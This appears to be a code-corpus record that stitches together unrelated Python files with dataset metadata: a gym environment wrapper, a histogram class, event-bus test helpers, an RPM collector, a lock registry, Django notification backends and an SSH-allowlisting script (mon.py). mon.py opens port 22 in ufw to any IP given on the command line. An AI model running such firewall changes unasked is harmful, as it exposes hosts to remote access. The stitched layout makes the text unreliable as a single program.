    def get_state(self):
        """
        Extract the current state from the unwrapped gym environment, trying
        the various conventions used across gym/pybullet environments.

        :return: the state of the unwrapped gym environment
        :rtype: np.ndarray
        :raises ValueError: if no known state-access convention applies
        """
        if (have_mujoco_flag is True and isinstance(self.unwrapped_gym, mujoco_env.MujocoEnv)) or (
                hasattr(self.unwrapped_gym, '_get_obs') and callable(self.unwrapped_gym._get_obs)):
            return self.unwrapped_gym._get_obs()
        elif hasattr(self.unwrapped_gym, '_get_ob') and callable(self.unwrapped_gym._get_ob):
            return self.unwrapped_gym._get_ob()
        elif hasattr(self.unwrapped_gym, 'state'):
            return self.unwrapped_gym.state if isinstance(self.unwrapped_gym.state, np.ndarray) else np.array(
                self.unwrapped_gym.state)
        elif hasattr(self.unwrapped_gym, 'observation'):
            # Bug fix: this fallback previously converted ``state`` instead of
            # ``observation``, which raised AttributeError for environments
            # that only expose ``observation``.
            return self.unwrapped_gym.observation if isinstance(self.unwrapped_gym.observation,
                                                                np.ndarray) else np.array(
                self.unwrapped_gym.observation)
        elif hasattr(self.unwrapped_gym, 'spec') and hasattr(self.unwrapped_gym.spec,
                                                             'id') and self.unwrapped_gym.spec.id in specialEnv:
            # Environment-specific extractors (see ``specialEnv`` below).
            return specialEnv[self.unwrapped_gym.spec.id](self)
        elif hasattr(self.unwrapped_gym, 'robot'):
            # pybullet-style environments expose state via their robot object.
            return self.unwrapped_gym.robot.calc_state()
        else:
            raise ValueError('Env id: {} is not supported for method get_state'.format(self.env_id))

    @property
    def unwrapped(self):
        """
        :return: the gym environment instance created by ``gym.make``
        :rtype: gym env
        """
        return self._gym_env

    @property
    def unwrapped_gym(self):
        """
        :return: the fully unwrapped gym environment (follows ``unwrapped``
            when the wrapper exposes it)
        :rtype: gym env
        """
        if hasattr(self._gym_env, 'unwrapped'):
            return self._gym_env.unwrapped
        else:
            return self._gym_env

    @staticmethod
    def _sample_with_nan(space: garage_space.Space):
        """
        Sample uniformly in [-1, 1] per dimension and clip into the
        (NaN-sanitized) bounds of *space*; this keeps sampling meaningful
        for boxes whose original bounds were infinite or NaN.

        :param space: a Box-type space
        :return: a sample clipped into the space's bounds
        :rtype: np.ndarray
        """
        assert isinstance(space, garage_space.Box)
        high = np.ones_like(space.low)
        low = -1 * np.ones_like(space.high)
        return np.clip(np.random.uniform(low=low, high=high, size=space.low.shape),
                       a_min=space.low,
                       a_max=space.high)

    def __str__(self):
        return "<GymEnv instance> {}".format(self.env_id)
def get_lunarlander_state(env):
    """Reconstruct the 8-dim LunarLander-v2 observation from the env internals.

    Mirrors the normalization done inside gym's LunarLander step():
    position/velocity scaled by viewport and FPS constants, plus angle,
    angular velocity and the two leg ground-contact flags.
    """
    pos = env.unwrapped_gym.lander.position
    vel = env.unwrapped_gym.lander.linearVelocity
    # Constants copied from gym's LunarLander implementation — must match it.
    fps = 50
    scale = 30.0  # affects how fast-paced the game is, forces should be adjusted as well
    leg_down = 18
    viewport_w = 600
    viewport_h = 400
    state = [
        (pos.x - viewport_w / scale / 2) / (viewport_w / scale / 2),
        (pos.y - (env.unwrapped_gym.helipad_y + leg_down / scale)) / (viewport_h / scale / 2),
        vel.x * (viewport_w / scale / 2) / fps,
        vel.y * (viewport_h / scale / 2) / fps,
        env.unwrapped_gym.lander.angle,
        20.0 * env.unwrapped_gym.lander.angularVelocity / fps,
        1.0 if env.unwrapped_gym.legs[0].ground_contact else 0.0,
        1.0 if env.unwrapped_gym.legs[1].ground_contact else 0.0
    ]
    return np.array(state, dtype=np.float32)
specialEnv = {
'LunarLander-v2': get_lunarlander_state
}
| <filename>baconian/envs/gym_env.py
from baconian.core.core import Env, EnvSpec
import gym.envs
from gym.envs.registration import registry
# do not remove the following import statements
import pybullet
import pybullet_envs
have_mujoco_flag = True
try:
from gym.envs.mujoco import mujoco_env
except Exception:
have_mujoco_flag = False
import numpy as np
import types
import gym.spaces as GymSpace
import baconian.common.spaces as garage_space
import gym.error as gym_error
_env_inited_count = dict()
def make(gym_env_id: str, allow_multiple_env=True):
"""
:param gym_env_id: gym environment id
:type gym_env_id: int
:param allow_multiple_env: allow multiple environments, by default True
:type allow_multiple_env: bool
:return: new gym environment
:rtype: GymEnv
"""
if allow_multiple_env is True:
if gym_env_id not in _env_inited_count:
_env_inited_count[gym_env_id] = 0
else:
_env_inited_count[gym_env_id] += 1
return GymEnv(gym_env_id, name='{}_{}'.format(gym_env_id, _env_inited_count[gym_env_id]))
else:
return GymEnv(gym_env_id)
def space_converter(space: GymSpace.Space):
"""
Convert space into any one of "Box", "Discrete", or "Tuple" type.
:param space: space of gym environment
:type space: GymSpace
:return: converted space
:rtype: Box, Discrete, or Tuple
"""
if isinstance(space, GymSpace.Box):
return garage_space.Box(low=space.low, high=space.high)
elif isinstance(space, GymSpace.Dict):
return garage_space.Dict(space.spaces)
elif isinstance(space, GymSpace.Discrete):
return garage_space.Discrete(space.n)
elif isinstance(space, GymSpace.Tuple):
return garage_space.Tuple(list(map(space_converter, space.spaces)))
else:
raise NotImplementedError
class GymEnv(Env):
"""
Gym environment wrapping module
"""
_all_gym_env_id = list(registry.env_specs.keys())
def __init__(self, gym_env_id: str, name: str = None):
"""
:param gym_env_id: gym environment id
:type gym_env_id: str
:param name: name of the gym environment instance
:type name: str
"""
super().__init__(name=name if name else gym_env_id)
self.env_id = gym_env_id
try:
self._gym_env = gym.make(gym_env_id)
except gym_error.UnregisteredEnv:
raise ValueError('Env id: {} is not supported currently'.format(gym_env_id))
self._gym_env = gym.make(gym_env_id)
self.action_space = space_converter(self._gym_env.action_space)
self.observation_space = space_converter(self._gym_env.observation_space)
if isinstance(self.action_space, garage_space.Box):
self.action_space.low = np.nan_to_num(self.action_space.low)
self.action_space.high = np.nan_to_num(self.action_space.high)
self.action_space.sample = types.MethodType(self._sample_with_nan, self.action_space)
if isinstance(self.observation_space, garage_space.Box):
self.observation_space.low = np.nan_to_num(self.observation_space.low)
self.observation_space.high = np.nan_to_num(self.observation_space.high)
self.observation_space.sample = types.MethodType(self._sample_with_nan, self.observation_space)
self.env_spec = EnvSpec(obs_space=self.observation_space,
action_space=self.action_space)
self.reward_range = self._gym_env.reward_range
def step(self, action):
"""
:param action: action to be taken by agent in the environment
:type action: action to be taken by agent in the environment
:return: step of the unwrapped environment
:rtype: gym env
"""
super().step(action)
action = self.env_spec.flat_action(action)
state, re, done, info = self.unwrapped.step(action=action)
return state, re, bool(done), info
def reset(self):
"""
Reset the gym environment.
:return:
"""
super().reset()
return self.unwrapped.reset()
def init(self):
"""
Initialize the gym environment.
:return:
"""
super().init()
return self.reset()
def seed(self, seed=None):
"""
:param seed: seed of random number generalization
:type seed: int
:return: seed of the unwrapped environment
:rtype: int
"""
return super().seed(seed)
def get_state(self):
"""
:return:the state of unwrapped gym environment
:rtype: np.ndarray
"""
if (have_mujoco_flag is True and isinstance(self.unwrapped_gym, mujoco_env.MujocoEnv)) or (
hasattr(self.unwrapped_gym, '_get_obs') and callable(self.unwrapped_gym._get_obs)):
return self.unwrapped_gym._get_obs()
elif hasattr(self.unwrapped_gym, '_get_ob') and callable(self.unwrapped_gym._get_ob):
return self.unwrapped_gym._get_ob()
elif hasattr(self.unwrapped_gym, 'state'):
return self.unwrapped_gym.state if isinstance(self.unwrapped_gym.state, np.ndarray) else np.array(
self.unwrapped_gym.state)
elif hasattr(self.unwrapped_gym, 'observation'):
return self.unwrapped_gym.observation if isinstance(self.unwrapped_gym.observation,
np.ndarray) else np.array(
self.unwrapped_gym.state)
elif hasattr(self.unwrapped_gym, 'spec') and hasattr(self.unwrapped_gym.spec,
'id') and self.unwrapped_gym.spec.id in specialEnv:
return specialEnv[self.unwrapped_gym.spec.id](self)
elif hasattr(self.unwrapped_gym, 'robot'):
return self.unwrapped_gym.robot.calc_state()
else:
raise ValueError('Env id: {} is not supported for method get_state'.format(self.env_id))
@property
def unwrapped(self):
"""
:return: original unwrapped gym environment
:rtype: gym env
"""
return self._gym_env
@property
def unwrapped_gym(self):
"""
:return: gym environment, depend on attribute 'unwrapped'
:rtype: gym env
"""
if hasattr(self._gym_env, 'unwrapped'):
return self._gym_env.unwrapped
else:
return self._gym_env
@staticmethod
def _sample_with_nan(space: garage_space.Space):
"""
:param space: a 'Box'type space
:return: numpy clip of space that contains nan values
:rtype: np.ndarray
"""
assert isinstance(space, garage_space.Box)
high = np.ones_like(space.low)
low = -1 * np.ones_like(space.high)
return np.clip(np.random.uniform(low=low, high=high, size=space.low.shape),
a_min=space.low,
a_max=space.high)
def __str__(self):
return "<GymEnv instance> {}".format(self.env_id)
def get_lunarlander_state(env):
pos = env.unwrapped_gym.lander.position
vel = env.unwrapped_gym.lander.linearVelocity
fps = 50
scale = 30.0 # affects how fast-paced the game is, forces should be adjusted as well
leg_down = 18
viewport_w = 600
viewport_h = 400
state = [
(pos.x - viewport_w / scale / 2) / (viewport_w / scale / 2),
(pos.y - (env.unwrapped_gym.helipad_y + leg_down / scale)) / (viewport_h / scale / 2),
vel.x * (viewport_w / scale / 2) / fps,
vel.y * (viewport_h / scale / 2) / fps,
env.unwrapped_gym.lander.angle,
20.0 * env.unwrapped_gym.lander.angularVelocity / fps,
1.0 if env.unwrapped_gym.legs[0].ground_contact else 0.0,
1.0 if env.unwrapped_gym.legs[1].ground_contact else 0.0
]
return np.array(state, dtype=np.float32)
specialEnv = {
'LunarLander-v2': get_lunarlander_state
}
| en | 0.735588 | # do not remove the following import statements :param gym_env_id: gym environment id :type gym_env_id: int :param allow_multiple_env: allow multiple environments, by default True :type allow_multiple_env: bool :return: new gym environment :rtype: GymEnv Convert space into any one of "Box", "Discrete", or "Tuple" type. :param space: space of gym environment :type space: GymSpace :return: converted space :rtype: Box, Discrete, or Tuple Gym environment wrapping module :param gym_env_id: gym environment id :type gym_env_id: str :param name: name of the gym environment instance :type name: str :param action: action to be taken by agent in the environment :type action: action to be taken by agent in the environment :return: step of the unwrapped environment :rtype: gym env Reset the gym environment. :return: Initialize the gym environment. :return: :param seed: seed of random number generalization :type seed: int :return: seed of the unwrapped environment :rtype: int :return:the state of unwrapped gym environment :rtype: np.ndarray :return: original unwrapped gym environment :rtype: gym env :return: gym environment, depend on attribute 'unwrapped' :rtype: gym env :param space: a 'Box'type space :return: numpy clip of space that contains nan values :rtype: np.ndarray # affects how fast-paced the game is, forces should be adjusted as well | 2.248348 | 2 |
python/mon.py | pthub/sysdig | 0 | 6613963 | <filename>python/mon.py
#!/usr/bin/python
import os
import time
import smtplib
from subprocess import call
import sys
import socket
def check_ip(IP):
    # inet_aton raises socket.error for anything that is not a valid
    # (possibly shorthand) dotted IPv4 address.
    try:
        socket.inet_aton(IP)
    except socket.error:
        return False
    return True
def send_email(IP):
    """Send a notification mail (via Gmail SMTP) that *IP* triggered an event."""
    #add the sender email address
    mailersender = ""
    #add the sender password
    mailerpass = ""
    #add the receiver email address
    # NOTE(review): this is a plain string; ", ".join(mailerreceiver) below
    # joins its *characters* — it was likely meant to be a list of addresses.
    mailerreceiver = ""
    # Prepare actual message
    # NOTE(review): the subject format yields "event--<IP>" (double dash) and
    # the headers are not RFC-compliant ("\From"); confirm intended layout.
    message = """\From: %s\nTo: %s\nSubject: %s-%s\n\n
    """ % (mailersender, ", ".join(mailerreceiver), 'event-', IP)
    try:
        server = smtplib.SMTP("smtp.gmail.com", 587)
        server.ehlo()
        # Upgrade the connection to TLS before authenticating.
        server.starttls()
        server.login(mailersender, mailerpass)
        server.sendmail(mailersender, mailerreceiver, message)
        server.close()
        print 'successfully sent the mail'
    # NOTE(review): bare except hides the real SMTP/auth error; narrow it.
    except:
        print "failed to send mail"
# Entry point: argv[1] is expected to be an IPv4 address. If valid, open
# SSH (port 22) for it in ufw and mail a notification about the event.
if check_ip(sys.argv[1]):
    call(["ufw", "allow", "from", sys.argv[1], "to", "any", "port", "22"])
    send_email(sys.argv[1])
| <filename>python/mon.py
#!/usr/bin/python
import os
import time
import smtplib
from subprocess import call
import sys
import socket
def check_ip(IP):
try:
socket.inet_aton(IP)
return True
except socket.error:
return False
def send_email(IP):
#add the sender email address
mailersender = ""
#add the sender password
mailerpass = ""
#add the receiver email address
mailerreceiver = ""
# Prepare actual message
message = """\From: %s\nTo: %s\nSubject: %s-%s\n\n
""" % (mailersender, ", ".join(mailerreceiver), 'event-', IP)
try:
server = smtplib.SMTP("smtp.gmail.com", 587)
server.ehlo()
server.starttls()
server.login(mailersender, mailerpass)
server.sendmail(mailersender, mailerreceiver, message)
server.close()
print 'successfully sent the mail'
except:
print "failed to send mail"
if check_ip(sys.argv[1]):
call(["ufw", "allow", "from", sys.argv[1], "to", "any", "port", "22"])
send_email(sys.argv[1])
| en | 0.379657 | #!/usr/bin/python #add the sender email address #add the sender password #add the receiver email address # Prepare actual message \From: %s\nTo: %s\nSubject: %s-%s\n\n | 2.76576 | 3 |
gibberish/histogram.py | elmadjian/pyvision | 0 | 6613964 | import cv2, sys, file_handler
import numpy as np
import matplotlib.pyplot as plt
class Histogram():
    """Grayscale histogram computations over the image named on the command line."""

    def __init__(self):
        # Load the image given in argv and keep a grayscale copy to histogram.
        self.img = file_handler.open_image(sys.argv)
        self.gray_img = cv2.cvtColor(self.img, cv2.COLOR_BGR2GRAY)
        # Most recently computed histogram (list of length N), or None.
        self.histogram = None

    def standard_grayscale_histogram(self, N):
        """Return the absolute frequency of each of the N gray levels."""
        h = [0] * N
        for row in self.gray_img:
            for intensity in row:
                h[intensity] += 1
        self.histogram = h
        return h

    def relative_f_grayscale_histogram(self, N):
        """Return the relative-frequency histogram (counts / total pixels)."""
        rows = self.gray_img.shape[0]
        cols = self.gray_img.shape[1]
        counts = self.standard_grayscale_histogram(N)
        h = [c / (rows * cols) for c in counts]
        self.histogram = h
        return h

    def equalized_grayscale_histogram(self, N):
        """Return the equalization mapping ``f[i] = round(cdf(i) * (N - 1))``."""
        h = self.relative_f_grayscale_histogram(N)
        f = [0] * N
        # Running CDF accumulator; the original code named this ``sum``,
        # shadowing the built-in.
        cumulative = 0
        for i in range(N):
            cumulative += h[i]
            f[i] = round(cumulative * (N - 1))
        self.histogram = f
        return f

    def plot_histogram(self):
        """Plot the most recently computed histogram with matplotlib."""
        plt.plot(self.histogram)
        plt.ylabel("frequency")
        plt.show()
if __name__ == "__main__":
    # Smoke-test entry point: loads the image named on the command line.
    h = Histogram()
    # h.standard_grayscale_histogram()
    # h.plot_histogram()
    # h.relative_f_grayscale_histogram()
    # h.plot_histogram()
    # h.equalized_grayscale_histogram(256)
    # h.plot_histogram()
| import cv2, sys, file_handler
import numpy as np
import matplotlib.pyplot as plt
class Histogram():
def __init__(self):
self.img = file_handler.open_image(sys.argv)
self.gray_img = cv2.cvtColor(self.img, cv2.COLOR_BGR2GRAY)
self.histogram = None
def standard_grayscale_histogram(self, N):
h = [0 for i in range(N)]
for row in self.gray_img:
for intensity in row:
h[intensity] += 1
self.histogram = h
return h
def relative_f_grayscale_histogram(self, N):
rows = self.gray_img.shape[0]
cols = self.gray_img.shape[1]
h = self.standard_grayscale_histogram(N)
h = [i/(rows*cols) for i in h]
self.histogram = h
return h
def equalized_grayscale_histogram(self, N):
h = self.relative_f_grayscale_histogram(N)
f = [0 for i in range(N)]
sum = 0
for i in range(N):
sum += h[i]
f[i] = round(sum * (N-1))
self.histogram = f
return f
def plot_histogram(self):
plt.plot(self.histogram)
plt.ylabel("frequency")
plt.show()
if __name__ == "__main__":
h = Histogram()
# h.standard_grayscale_histogram()
# h.plot_histogram()
# h.relative_f_grayscale_histogram()
# h.plot_histogram()
# h.equalized_grayscale_histogram(256)
# h.plot_histogram()
| en | 0.277368 | # h.standard_grayscale_histogram() # h.plot_histogram() # h.relative_f_grayscale_histogram() # h.plot_histogram() # h.equalized_grayscale_histogram(256) # h.plot_histogram() | 3.224055 | 3 |
tests/core/asyncio/helpers.py | lithp/lahja | 0 | 6613965 | from typing import Any, Callable, Set, Type # noqa: F401,
from cytoolz import curry
from lahja import BaseEvent, BaseRequestResponseEvent
class DummyRequest(BaseEvent):
    # Test-fixture event; the class attribute only marks the event type.
    property_of_dummy_request = None
class DummyResponse(BaseEvent):
    # Test-fixture response event paired with DummyRequestPair.
    property_of_dummy_response = None
    def __init__(self, something):
        # The payload argument is deliberately ignored by this dummy.
        pass
class DummyRequestPair(BaseRequestResponseEvent[DummyResponse]):
    # Request half of a request/response fixture pair.
    property_of_dummy_request_pair = None
    @staticmethod
    def expected_response_type():
        # Lahja uses this to validate the type of the response sent back.
        return DummyResponse
class Tracker:
    """Test helper that records which track ids have been seen."""
    def __init__(self):
        # Set of all track ids passed to track_and_run so far.
        self._tracker = set()
    def exists(self, track_id):
        """Return True if ``track_id`` has already been tracked."""
        return track_id in self._tracker
    def track_and_run(self, track_id, continue_fn):
        """
        Add ``track_id`` to the internal accounting and continue with ``continue_fn``
        """
        self._tracker.add(track_id)
        return continue_fn()
    # curry (cytoolz) lets callers partially apply track_id/endpoint and pass
    # the result as an event handler receiving only ``ev``.
    @curry
    def track_and_broadcast_dummy(self, track_id, endpoint, ev):
        """Track ``track_id`` and broadcast a DummyResponse back for ``ev``."""
        self.track_and_run(
            track_id,
            lambda: endpoint.broadcast_nowait(
                DummyResponse(ev.property_of_dummy_request_pair), ev.broadcast_config()
            ),
        )
| from typing import Any, Callable, Set, Type # noqa: F401,
from cytoolz import curry
from lahja import BaseEvent, BaseRequestResponseEvent
class DummyRequest(BaseEvent):
property_of_dummy_request = None
class DummyResponse(BaseEvent):
property_of_dummy_response = None
def __init__(self, something):
pass
class DummyRequestPair(BaseRequestResponseEvent[DummyResponse]):
property_of_dummy_request_pair = None
@staticmethod
def expected_response_type():
return DummyResponse
class Tracker:
def __init__(self):
self._tracker = set()
def exists(self, track_id):
return track_id in self._tracker
def track_and_run(self, track_id, continue_fn):
"""
Add ``track_id`` to the internal accounting and continue with ``continue_fn``
"""
self._tracker.add(track_id)
return continue_fn()
@curry
def track_and_broadcast_dummy(self, track_id, endpoint, ev):
self.track_and_run(
track_id,
lambda: endpoint.broadcast_nowait(
DummyResponse(ev.property_of_dummy_request_pair), ev.broadcast_config()
),
)
| en | 0.790277 | # noqa: F401, Add ``track_id`` to the internal accounting and continue with ``continue_fn`` | 2.068951 | 2 |
opbeatcli/deployment/packages/rpm.py | opbeat/opbeatcli | 1 | 6613966 | from opbeatcli.exceptions import DependencyParseError
from .base import BaseDependency, BaseDependencyCollector
from .types import RPM_PACKAGE
class RPMCollector(BaseDependencyCollector):
    """Collects installed RPM packages by shelling out to ``rpm --query``."""

    # NOTE(review): %{VERSION}%{RELEASE} has no separator; the conventional
    # format is %{VERSION}-%{RELEASE} — confirm the intended output shape.
    default_commands = [
        r"rpm --query --all --queryformat='%{NAME} %{VERSION}%{RELEASE}\n'"
    ]

    def parse(self, output):
        """Yield an ``RPMDependency`` for every ``<name> <version>`` line."""
        for raw_line in output.splitlines():
            fields = raw_line.split()
            if len(fields) != 2:
                # Anything other than exactly two fields is malformed output.
                raise DependencyParseError(raw_line)
            pkg_name, pkg_version = fields
            yield RPMDependency(name=pkg_name, version=pkg_version)
class RPMDependency(BaseDependency):
    # A single installed RPM package reported to Opbeat.
    package_type = RPM_PACKAGE
| from opbeatcli.exceptions import DependencyParseError
from .base import BaseDependency, BaseDependencyCollector
from .types import RPM_PACKAGE
class RPMCollector(BaseDependencyCollector):
default_commands = [
r"rpm --query --all --queryformat='%{NAME} %{VERSION}%{RELEASE}\n'"
]
def parse(self, output):
for line in output.splitlines():
try:
name, version = line.split()
except ValueError:
raise DependencyParseError(line)
yield RPMDependency(name=name, version=version)
class RPMDependency(BaseDependency):
package_type = RPM_PACKAGE
| none | 1 | 2.248722 | 2 | |
Operating and Distributed Systems (Python)/Banking System with RPC (centralised)/ServerLibs/DataBase/globalLock.py | PFigs/portfolio | 0 | 6613967 | <reponame>PFigs/portfolio<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
The global lock preserves corectness of transactions by deducting money
only when available. This allows the database to be multithreaded and
accept requests concurrently.
"""
from threading import Lock
class GlobalLock:
    """Per-(entity, id) lock registry guarded by one internal meta-lock.

    ``acquire``/``release`` lazily create and tear down fine-grained locks so
    that concurrent transactions on different accounts do not block each
    other, while operations on the same account are serialized.
    (Python 2 source — note the print statements.)
    """
    def __init__( self ):
        # Maps str(id(entity)) -> { str(Id) -> [Lock, waiter_count] }.
        self.__entitys = {}
        # Meta-lock protecting the registry itself; created lazily.
        self.__lock = None
    def Close( self ):
        pass
    def acquire( self, entity, Id ):
        """Block until the lock for (entity, Id) is held by the caller."""
        if self.__lock is None:
            self.__lock = Lock()
        self.__lock.acquire()
        # Create-or-fetch the [lock, waiters] token under the meta-lock,
        # and register as a waiter before releasing it, so release() cannot
        # delete the token while we are still queued on it.
        token = self.__Read( entity, Id, True)
        token[1] += 1
        self.__lock.release()
        token[0].acquire()
        token[1] -= 1
    def release( self, entity, Id ):
        """Release the lock for (entity, Id); raises if it was never acquired."""
        if self.__lock is None:
            raise ValueError( 'Impossible to make a release account '+str(Id) )
        self.__lock.acquire()
        # __Read with Assign=False also garbage-collects the token when no
        # other thread is waiting on it.
        lock = self.__Read( entity, Id, False )
        if self.__lock is None:
            raise ValueError( 'Impossible to make a release account '+str(Id) )
        self.__lock.release()
        if lock is None:
            raise ValueError( 'Impossible to make a release account '+str(Id) )
        lock.release()
        if not self.__entitys:
            print 'QUER APAGAR LOCK', Id
#            temp = self.__lock
#            self.__lock = None
#            del temp
    def __Read( self, entity, Id, Assign ):
        """Look up (and with Assign=True, create) the token for (entity, Id).

        Must be called with the meta-lock held. With Assign=False the token's
        lock is returned and empty registry entries are pruned.
        """
        entityName = str( entity )
        # Entities are keyed by object identity, not by value.
        entityId = str( id(entity) )
        entity = self.__entitys.get( entityId, None )
        if entity is None:
            if Assign:
                self.__entitys[ entityId ] = {}
                entity = self.__entitys[ entityId ]
            else:
                raise ValueError( "The entity provided does not have any lock assigned: "+entityName )
        token = entity.get( str( Id ), None )
        if token is None:
            if Assign:
                # [lock, number of threads currently waiting on it]
                entity[ str( Id ) ] = [ Lock(), 0 ]
                token = entity[ str( Id ) ]
            else:
                raise ValueError( "The id provided does not have a lock assigned: "+str(Id)+" from "+entityName )
        if not Assign:
            waiting = token[1]
            token = token[0]
            # NOTE(review): identity comparison with 0 ('is 0') happens to
            # work for CPython small ints but should be '== 0'.
            if waiting is 0:
                # No waiters: drop the token, and the entity entry if empty.
                temp = entity.pop( str(Id) )
                del temp
            if not entity:
                temp = self.__entitys.pop( entityId )
                del temp
        return token
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
The global lock preserves corectness of transactions by deducting money
only when available. This allows the database to be multithreaded and
accept requests concurrently.
"""
from threading import Lock
class GlobalLock:
def __init__( self ):
self.__entitys = {}
self.__lock = None
def Close( self ):
pass
def acquire( self, entity, Id ):
if self.__lock is None:
self.__lock = Lock()
self.__lock.acquire()
token = self.__Read( entity, Id, True)
token[1] += 1
self.__lock.release()
token[0].acquire()
token[1] -= 1
def release( self, entity, Id ):
if self.__lock is None:
raise ValueError( 'Impossible to make a release account '+str(Id) )
self.__lock.acquire()
lock = self.__Read( entity, Id, False )
if self.__lock is None:
raise ValueError( 'Impossible to make a release account '+str(Id) )
self.__lock.release()
if lock is None:
raise ValueError( 'Impossible to make a release account '+str(Id) )
lock.release()
if not self.__entitys:
print 'QUER APAGAR LOCK', Id
# temp = self.__lock
# self.__lock = None
# del temp
def __Read( self, entity, Id, Assign ):
entityName = str( entity )
entityId = str( id(entity) )
entity = self.__entitys.get( entityId, None )
if entity is None:
if Assign:
self.__entitys[ entityId ] = {}
entity = self.__entitys[ entityId ]
else:
raise ValueError( "The entity provided does not have any lock assigned: "+entityName )
token = entity.get( str( Id ), None )
if token is None:
if Assign:
entity[ str( Id ) ] = [ Lock(), 0 ]
token = entity[ str( Id ) ]
else:
raise ValueError( "The id provided does not have a lock assigned: "+str(Id)+" from "+entityName )
if not Assign:
waiting = token[1]
token = token[0]
if waiting is 0:
temp = entity.pop( str(Id) )
del temp
if not entity:
temp = self.__entitys.pop( entityId )
del temp
return token | en | 0.804189 | #!/usr/bin/env python # -*- coding: utf-8 -*- The global lock preserves corectness of transactions by deducting money only when available. This allows the database to be multithreaded and accept requests concurrently. # temp = self.__lock # self.__lock = None # del temp | 3.378925 | 3 |
Lib/site-packages/django_notifications/backends/__init__.py | jiangyifan123/EngLearner | 0 | 6613968 | <filename>Lib/site-packages/django_notifications/backends/__init__.py
import sys
from django.conf import settings
# Maps short backend keys (usable in settings.NOTIFICATIONS) to the dotted
# path of the backend class implementing that delivery channel.
BACKEND_CLASSES = {
    'email': 'django_notifications.backends.email.EmailBackend',
    'xmpp': 'django_notifications.backends.xmpp.XMPPBackend',
    'sms_mobitel': 'django_notifications.backends.sms_mobitel.SMSMobitelBackend',
    'postmark': 'django_notifications.backends.postmark.PostmarkBackend',
}
def get_available_backends(configured_only = False):
    """
    Returns a list of ``(key, name, description)`` tuples for all backends.
    If configured_only = True only those backends which are
    properly configured (and not flagged ``not_available``) are returned.
    """
    available_backends = []
    for key in BACKEND_CLASSES.keys():
        module_name = get_module_and_class_name(BACKEND_CLASSES[key])[0]
        # Instantiating the backend also imports its module into sys.modules.
        class_instance = get_class_instance_by_key(key)
        module = sys.modules[module_name]
        try:
            not_available = getattr(module, 'not_available')
        except AttributeError:
            not_available = None
        # NOTE(review): if a backend lacks is_configured, this calls False()
        # and raises TypeError — confirm every backend defines the method.
        is_configured = getattr(class_instance, 'is_configured', False)()
        meta = getattr(class_instance, 'meta', None)
        # Skip backends without metadata, and (in configured_only mode)
        # those that are unconfigured or marked unavailable.
        if not meta or (configured_only and not is_configured) \
            or (configured_only and not_available):
            continue
        name = meta['NAME']
        description = meta['DESCRIPTION']
        available_backends.append((key, name, description))
    return available_backends
def get_settings(backend_key, use_default = True):
    """
    Returns all the settings for the provided backend key.

    With ``use_default=True`` the backend module's required defaults are
    loaded first, then overridden by settings.NOTIFICATIONS[backend_key].
    Raises EnvironmentError for an unknown key or missing NOTIFICATIONS.
    """
    notification_settings = getattr(settings, 'NOTIFICATIONS', None)
    if not BACKEND_CLASSES.get(backend_key, None):
        raise EnvironmentError('Invalid backend: %s' % (backend_key))
    if not notification_settings:
        raise EnvironmentError('NOTIFICATIONS was not found.')
    # Default backend settings: the 'required' dict declared by the module.
    if use_default:
        module_name = get_module_and_class_name(BACKEND_CLASSES[backend_key])[0]
        __import__(module_name)
        module = sys.modules[module_name]
        backend_settings = getattr(module, 'SETTINGS')['required']
    else:
        backend_settings = {}
    # User settings for this backend are optional; silently keep defaults.
    try:
        backend_settings.update(notification_settings[backend_key])
    except KeyError:
        pass
    return backend_settings
# "Helper" methods
def get_module_and_class_name(class_path):
    """Split a dotted path like ``pkg.mod.Class`` into ``('pkg.mod', 'Class')``.

    Uses ``rpartition`` so an undotted input yields ``('', class_path)``;
    the previous ``rfind``-based slicing silently mangled such inputs
    (chopping the last character off the "module" part).
    """
    module_name, _, class_name = class_path.rpartition('.')
    return module_name, class_name
def get_class_instance_by_key(key):
    """Import and instantiate the backend class registered under ``key``.

    Returns None for an unknown key. The backend class is instantiated
    with no arguments.
    """
    try:
        class_path = BACKEND_CLASSES[key]
    except KeyError:
        return None
    module_name, class_name = get_module_and_class_name(class_path)
    # Import the module by name, then pull it from sys.modules.
    __import__(module_name)
    module = sys.modules[module_name]
    class_instance = getattr(module, class_name)()
    return class_instance
import sys
from django.conf import settings
BACKEND_CLASSES = {
'email': 'django_notifications.backends.email.EmailBackend',
'xmpp': 'django_notifications.backends.xmpp.XMPPBackend',
'sms_mobitel': 'django_notifications.backends.sms_mobitel.SMSMobitelBackend',
'postmark': 'django_notifications.backends.postmark.PostmarkBackend',
}
def get_available_backends(configured_only = False):
"""
Returns a list of all the available backends.
If configured_only = True only those backends which are
properly configured are returned.
"""
available_backends = []
for key in BACKEND_CLASSES.keys():
module_name = get_module_and_class_name(BACKEND_CLASSES[key])[0]
class_instance = get_class_instance_by_key(key)
module = sys.modules[module_name]
try:
not_available = getattr(module, 'not_available')
except AttributeError:
not_available = None
is_configured = getattr(class_instance, 'is_configured', False)()
meta = getattr(class_instance, 'meta', None)
if not meta or (configured_only and not is_configured) \
or (configured_only and not_available):
continue
name = meta['NAME']
description = meta['DESCRIPTION']
available_backends.append((key, name, description))
return available_backends
def get_settings(backend_key, use_default = True):
"""
Returns all the settings for the provided backend key.
"""
notification_settings = getattr(settings, 'NOTIFICATIONS', None)
if not BACKEND_CLASSES.get(backend_key, None):
raise EnvironmentError('Invalid backend: %s' % (backend_key))
if not notification_settings:
raise EnvironmentError('NOTIFICATIONS was not found.')
# Default backend settings
if use_default:
module_name = get_module_and_class_name(BACKEND_CLASSES[backend_key])[0]
__import__(module_name)
module = sys.modules[module_name]
backend_settings = getattr(module, 'SETTINGS')['required']
else:
backend_settings = {}
try:
backend_settings.update(notification_settings[backend_key])
except KeyError:
pass
return backend_settings
# "Helper" methods
def get_module_and_class_name(class_path):
module_name = class_path[:class_path.rfind('.')]
class_name = class_path[class_path.rfind('.') + 1:]
return module_name, class_name
def get_class_instance_by_key(key):
try:
class_path = BACKEND_CLASSES[key]
except KeyError:
return None
module_name, class_name = get_module_and_class_name(class_path)
__import__(module_name)
module = sys.modules[module_name]
class_instance = getattr(module, class_name)()
return class_instance | en | 0.81538 | Returns a list of all the available backends. If configured_only = True only those backends which are properly configured are returned. Returns all the settings for the provided backend key. # Default backend settings # "Helper" methods | 2.027084 | 2 |
hotbit/trade/trade.py | a-parida12/hotbit-python | 1 | 6613969 | from hotbit.base_request.base_request import HotbitBaseRestApi
import json
from typing import List
class TradeData(HotbitBaseRestApi):
